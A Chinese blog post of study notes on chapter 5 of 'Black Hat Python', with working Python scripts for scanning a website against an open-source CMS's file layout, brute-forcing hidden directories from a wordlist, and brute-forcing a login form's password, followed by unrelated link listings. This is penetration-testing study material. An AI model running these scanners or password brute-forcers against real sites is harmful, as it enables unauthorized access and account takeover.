对开源CMS进行扫描

import os

import queue

import requests  # 原书编写时间过于久远 现在有requests库对已经对原来的库进行封装 更容易调用

import threading

# 设置线程

threads = 10

# 指定网站

target = ""

# 指定本地扫描路径

directory = ""

# 无效文件的后缀

filters = [".jpg", ".gif", ".png", ".css"]

# 切换路径

os.chdir(directory)

# 实例化queue

web_paths = queue.Queue()

# 在当前目录下进行遍历目录或文件  r:当前路径   d:当前路径下的子目录  f:当前路径下的文件

for r, d, f in os.walk("."):

    for files in f:

        remote_path = "%s%s" % (r, files)

        # 将以“.”开头的文件,去掉“.”    .\web\xxxx.php

        if remote_path.startswith("."):

            remote_path = remote_path[1:]

        # 排除后缀后,将其文件名压入队列

        if os.path.splitext(files)[1] not in filters:

            web_paths.put(remote_path)

# 构建URL,爆破网站目录

def test_remote():

    while not web_paths.empty():

        path = web_paths.get()

        url = "%s%s" % (target, path)

        try:

            res = requests.get(url)

            print("[%d] => %s" % (res.status_code, path))

            res.close()

        except Exception as err:

            # print(err)

            pass

# 开启多线程

for i in range(threads):

    print("Spawning thread: %d" % i)

    t = threading.Thread(target=test_remote)

    t.start()

暴力破解目录和文件位置

import requests

import threading

import queue

target = ""

threads = 20

dic = ""

# 读取字典中的数据,并格式化后发送

def dic_line(dic):

    txt = open(dic, 'rb')

    raw_words = txt.readlines()

    words = queue.Queue()

    txt.close()

    for word in raw_words:

        word = word.rstrip()

        words.put(word)

    return words

# 构造相应的url,对服务器进行爆破

def dir_line(dic_queue):

    while not dic_queue.empty():

        attempt = dic_queue.get().decode('')

        url = "%s%s" % (target, attempt)

        try:

            header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'}

            response = requests.get(url, headers=header)

            if response.status_code != 404:

                print("[%d] => %s" % (response.status_code, url))

        except requests.RequestException as e:

            print(e)

            pass

if __name__ == '__main__':

    wordlist = dic_line(dic)

    for i in range(threads):

        t = threading.Thread(target=dir_line, args=(wordlist, ))

        t.start()

暴力破解HTML表格验证

import queue

import requests

import threading

user_thread = 10

username = ""

wordlist_file = ""

target_url = ""

success_check = ""

# 定义类

class Bruter(object):

    # 初始化时需传参,接受用户名,密码参数

    def __init__(self, username, words):

        self.username = username

        self.password_q = words

        self.found = False

        print("Finished setting up for: %s" % username)

    # 定义类中多线程方法

    def run_bruteforce(self):

        for i in range(user_thread):

            t = threading.Thread(target=self.web_bruter)

            t.start()

    # 定义构造http请求包方法

    def web_bruter(self):

        while not self.password_q.empty() and not self.found:

            brute = self.password_q.get().rstrip()

            post_tags = {'log': 'root', 'pwd': brute}

            print("\b\b"*100, end="")

            print("\rTrying: %s : %s (%d left)" % (self.username, brute.decode('utf-8'), self.password_q.qsize()), end="")

            login_response = requests.post(target_url, data=post_tags)

            login_result = login_response.text

            if success_check not in login_result:

                self.found = True

                print("\n[*] Bruteforce successful.")

                print("[*] Username: %s" % username)

                print("[*] Password: %s" % brute.decode('utf-8'))

                print("[*] Waiting for other th"

                      "reads to exit...")

# 定义列举密码并发送函数

def build_wordlist(wordlist_file):

    fd = open(wordlist_file, "rb")

    raw_words = fd.readlines()

    fd.close()

    words = queue.Queue()

    for word in raw_words:

        word = word.rstrip()

        words.put(word)

    return words

# 运用

words = build_wordlist(wordlist_file)

bruter_obj = Bruter(username, words)

bruter_obj.run_bruteforce()

python黑帽子(第五章)的更多相关文章

  1. python黑帽子(第四章)

    Scapy窃取ftp登录账号密码 sniff函数的参数 filter 过滤规则,默认是嗅探所有数据包,具体过滤规则与wireshark相同. iface 参数设置嗅探器索要嗅探的网卡,默认对所有的网卡 ...

  2. python黑帽子(第三章)

    Windows/Linux下包的嗅探 根据os.name判断操作系统 下面是os的源码 posix是Linux nt是Windows 在windows中需要管理员权限.linux中需要root权限 因 ...

  3. 读书笔记 ~ Python黑帽子 黑客与渗透测试编程之道

    Python黑帽子  黑客与渗透测试编程之道   <<< 持续更新中>>> 第一章: 设置python 环境 1.python软件包管理工具安装 root@star ...

  4. 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道

    python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...

  5. python学习心得第五章

    python学习心得第五章 1.冒泡排序: 冒泡是一种基础的算法,通过这算法可以将一堆值进行有效的排列,可以是从大到小,可以从小到大,条件是任意给出的. 冒泡的原理: 将需要比较的数(n个)有序的两个 ...

  6. 进击的Python【第十五章】:Web前端基础之DOM

    进击的Python[第十五章]:Web前端基础之DOM 简介:文档对象模型(Document Object Model,DOM)是一种用于HTML和XML文档的编程接口.它给文档提供了一种结构化的表示 ...

  7. python 教程 第十五章、 结构布局

    第十五章. 结构布局 #!/usr/bin/env python #(1)起始行 "this is a module" #(2)模块文档 import sys #(3)模块导入 d ...

  8. 2018-06-21 中文代码示例视频演示Python入门教程第五章 数据结构

    知乎原链 续前作: 中文代码示例视频演示Python入门教程第四章 控制流 对应在线文档: 5. Data Structures 这一章起初还是采取了尽量与原例程相近的汉化方式, 但有些语义较偏(如T ...

  9. PYTHON 黑帽子第二章总结

    基于python3编写 import sys, socket, getopt, threading, argparse, subprocess # globals options listen = F ...

随机推荐

  1. vue学习过程总结(03) - 菜鸟教程归纳

    1.模板语法 1.1.文本插值,数据绑定.{{}},如: <p>{{ message }}</p> 1.2.输出HTML代码.v-html,如: <div v-html= ...

  2. 简单了解一下pinia的结构

    随着 Vue3 的正式转正,Pinia 也渐渐火了起来.所以要更新一下自己的知识树了.这里主要是看看新的状态是什么"形态". 状态的容器还是"reactive" ...

  3. 《前端运维》三、Docker--1镜像与容器

    一.基本概念 如果我们想要让软件运行起来,首先要保证操作系统的设置,其次还需要依赖各种组件和库的正确安装.那么虚拟机就是一种带环境安装的一种解决方案,它可以实现在一种操作系统里面运行另外一种操作系统, ...

  4. Prometheus+alertmanager告警配置-2

    prometheus 告警 prometheus 通过alertmanager进行告警 实现监控告警的步骤: 在prometheus中定义告警规则rule_files alertmanager配置告警 ...

  5. 【推理引擎】ONNXRuntime 的架构设计

    ONNXRuntime,深度学习领域的神经网络模型推理框架,从名字中可以看出它和 ONNX 的关系:以 ONNX 模型作为中间表达(IR)的运行时(Runtime). 本文许多内容翻译于官方文档:ht ...

  6. Android中的Coroutine协程原理详解

    前言 协程是一个并发方案.也是一种思想. 传统意义上的协程是单线程的,面对io密集型任务他的内存消耗更少,进而效率高.但是面对计算密集型的任务不如多线程并行运算效率高. 不同的语言对于协程都有不同的实 ...

  7. python 面向对象的一些魔法方法和反射

    1.with和__enter__,__exit__,__init__配合使用class A: def __init__(self): print('init') def __enter__(self) ...

  8. JDBC中大数据量的分页解决方法?

    最好的办法是利用sql语句进行分页,这样每次查询出的结果集中就只包含某页的数据内容. sql语句分页,不同的数据库下的分页方案各不一样,下面是主流的三种数据库的分页sql: oracle: selec ...

  9. pg数据库org.postgresql.util.PSQLException: ERROR: "xxx" is not a sequence

    问题场景 对pg数据表执行插入语句的时候,报错如下: { "timestamp": 1587012576734, "status": 500, "er ...

  10. Java容器基础概况

    一.什么是Java容器 书写程序时,我们常常需要对大量的对象引用进行管理.为了实现有效的归类管理,我们常常将同类的引用放置在同一个数据容器中.Java容器类是java提供的工具包,包含了常用的数据结构 ...